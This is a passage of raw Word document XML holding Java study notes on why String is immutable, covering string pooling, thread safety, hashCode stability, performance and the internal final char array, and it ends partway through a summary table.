          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>String Pool</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to save memory.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E2EA48F" w14:textId="77777777" w:rsidR="00787647" w:rsidRPr="00CE4B95" w:rsidRDefault="00787647">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="111"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Since strings don't change, they can be </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>safely shared</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> among many references.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DAB0442" w14:textId="77777777" w:rsidR="00913A80" w:rsidRPr="00CE4B95" w:rsidRDefault="00913A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045902"/>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Java"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74CF0E99" w14:textId="77777777" w:rsidR="00913A80" w:rsidRPr="00CE4B95" w:rsidRDefault="00913A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045902"/>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Java"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EF28E5C" w14:textId="13E69021" w:rsidR="00913A80" w:rsidRPr="00CE4B95" w:rsidRDefault="00913A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045902"/>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s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rue → Same object in memory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="687301D7" w14:textId="77777777" w:rsidR="00787647" w:rsidRPr="00CE4B95"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27D0D480">
          <v:rect id="_x0000_i1090" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F1A7949" w14:textId="77777777" w:rsidR="00787647" w:rsidRPr="00CE4B95" w:rsidRDefault="00787647" w:rsidP="00787647">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3. Thread Safety</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55ABB9BD" w14:textId="77777777" w:rsidR="00787647" w:rsidRPr="00CE4B95" w:rsidRDefault="00787647">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="112"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Immutable objects are </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>automatically thread-safe</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="380167CB" w14:textId="77777777" w:rsidR="00787647" w:rsidRPr="00CE4B95" w:rsidRDefault="00787647">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="112"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>No need for synchronization since their state can’t change.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28F7B24F" w14:textId="77777777" w:rsidR="00787647" w:rsidRPr="00CE4B95" w:rsidRDefault="00787647" w:rsidP="00787647">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Multiple threads can safely use the same String object without causing issues.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41805931" w14:textId="77777777" w:rsidR="00787647" w:rsidRPr="00CE4B95"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1174F51D">
          <v:rect id="_x0000_i1091" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="73EA7421" w14:textId="77777777" w:rsidR="00787647" w:rsidRPr="00CE4B95" w:rsidRDefault="00787647" w:rsidP="00787647">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4. HashCode Consistency</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04761333" w14:textId="77777777" w:rsidR="00787647" w:rsidRPr="00CE4B95" w:rsidRDefault="00787647">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="113"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">String is often used as a key in </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>HashMap, HashSet, etc.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40CB2CB9" w14:textId="77777777" w:rsidR="00787647" w:rsidRPr="00CE4B95" w:rsidRDefault="00787647">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="113"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Since the value never changes, the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>hashCode stays constant</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, ensuring map integrity.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="663559D0" w14:textId="77777777" w:rsidR="00EE1AC1" w:rsidRPr="00CE4B95"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9685470"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pP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p>
    <w:p w14:paraId="27C367BE" w14:textId="77777777" w:rsidR="00EE1AC1" w:rsidRPr="00CE4B95"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9685470"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pP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ke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value"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AC33348" w14:textId="1CA11A16" w:rsidR="00EE1AC1" w:rsidRPr="00CE4B95"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9685470"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="880000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>// If "key" changed, we couldn't retrieve "value" reliably!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A9AD9CE" w14:textId="77777777" w:rsidR="00787647" w:rsidRPr="00CE4B95"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4EEC1F5E">
          <v:rect id="_x0000_i1092" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="01A295FF" w14:textId="77777777" w:rsidR="00787647" w:rsidRPr="00CE4B95" w:rsidRDefault="00787647" w:rsidP="00787647">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5. Performance</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5561092A" w14:textId="77777777" w:rsidR="00787647" w:rsidRPr="00CE4B95" w:rsidRDefault="00787647">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="114"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>JVM optimizes the use of strings due to immutability.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06A96C93" w14:textId="77777777" w:rsidR="00787647" w:rsidRPr="00CE4B95" w:rsidRDefault="00787647">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="114"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Reuse from the pool and predictable behavior helps the JVM optimize better.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CB6F9F4" w14:textId="77777777" w:rsidR="00787647" w:rsidRPr="00CE4B95"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537C3E13">
          <v:rect id="_x0000_i1093" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="029FC21D" w14:textId="6B728133" w:rsidR="00787647" w:rsidRPr="00CE4B95" w:rsidRDefault="00787647" w:rsidP="00787647">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Example of how it's immutable:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07ADE271" w14:textId="77777777" w:rsidR="00EE1AC1" w:rsidRPr="00CE4B95"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0064529"/>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Java"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34D4B81C" w14:textId="77777777" w:rsidR="00EE1AC1" w:rsidRPr="00CE4B95"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0064529"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w: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nca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 World"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FA7D756" w14:textId="77777777" w:rsidR="00EE1AC1" w:rsidRPr="00CE4B95"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0064529"/>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Java → Original string unchanged</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36F5716B" w14:textId="3DE49963" w:rsidR="00EE1AC1" w:rsidRPr="00CE4B95"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0064529"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w: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nca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 Worl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reates a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ring</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Java World"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> but doesn</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="008800"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>'t change s.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A65F3EB" w14:textId="77777777" w:rsidR="00787647" w:rsidRPr="00CE4B95"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60665271">
          <v:rect id="_x0000_i1094" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="144B7463" w14:textId="77777777" w:rsidR="00787647" w:rsidRPr="00CE4B95" w:rsidRDefault="00787647" w:rsidP="00787647">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Internally</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DBCB0AA" w14:textId="77777777" w:rsidR="00787647" w:rsidRPr="00CE4B95" w:rsidRDefault="00787647" w:rsidP="00787647">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>The String class has a private final char array:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F18052D" w14:textId="77777777" w:rsidR="00EE1AC1" w:rsidRPr="00CE4B95"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7431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78B81D6" w14:textId="77777777" w:rsidR="00EE1AC1" w:rsidRPr="00CE4B95"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743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ha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alue</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>[];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3240A997" w14:textId="5F6DB010" w:rsidR="00EE1AC1" w:rsidRPr="00CE4B95"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74316"/>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4462CEBD" w14:textId="77777777" w:rsidR="00787647" w:rsidRPr="00CE4B95" w:rsidRDefault="00787647">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="115"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>final → reference to the array can't change</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DA20606" w14:textId="77777777" w:rsidR="00787647" w:rsidRPr="00CE4B95" w:rsidRDefault="00787647">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="115"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>private → can't access directly</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BCDDF8E" w14:textId="1DB3EA13" w:rsidR="00787647" w:rsidRPr="00CE4B95" w:rsidRDefault="00787647">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="115"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Immutable at its core </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54064072" w14:textId="77777777" w:rsidR="00787647" w:rsidRPr="00CE4B95"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50759656">
          <v:rect id="_x0000_i1095" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EE34AFB" w14:textId="77777777" w:rsidR="00787647" w:rsidRPr="00CE4B95" w:rsidRDefault="00787647" w:rsidP="00787647">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8"/>
        <w:gridCol w:w="4035"/>
      </w:tblGrid>
      <w:tr w:rsidR="00787647" w:rsidRPr="00CE4B95" w14:paraId="6066DAE4" w14:textId="77777777" w:rsidTr="00787647">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="40C0326F" w14:textId="77777777" w:rsidR="00787647" w:rsidRPr="00CE4B95" w:rsidRDefault="00787647" w:rsidP="00EE1AC1">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Reason</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="285BAF75" w14:textId="77777777" w:rsidR="00787647" w:rsidRPr="00CE4B95" w:rsidRDefault="00787647" w:rsidP="00EE1AC1">
            <w:pPr>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Explanation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00787647" w:rsidRPr="00CE4B95" w14:paraId="732A2EBD" w14:textId="77777777" w:rsidTr="00787647">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="64E8504A" w14:textId="77777777" w:rsidR="00787647" w:rsidRPr="00CE4B95" w:rsidRDefault="00787647" w:rsidP="00787647">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Security</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3F5D2390" w14:textId="77777777" w:rsidR="00787647" w:rsidRPr="00CE4B95" w:rsidRDefault="00787647" w:rsidP="00787647">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Prevents sensitive data manipulation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00787647" w:rsidRPr="00CE4B95" w14:paraId="1C59470F" w14:textId="77777777" w:rsidTr="00787647">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="34500A4A" w14:textId="77777777" w:rsidR="00787647" w:rsidRPr="00CE4B95" w:rsidRDefault="00787647" w:rsidP="00787647">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00CE4B95">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>String Pooling</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7DA775A5" w14:textId="77777777" w:rsidR="00787647" w:rsidRPr="00CE4B95" w:rsidRDefault="00787647" w:rsidP="00787647">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
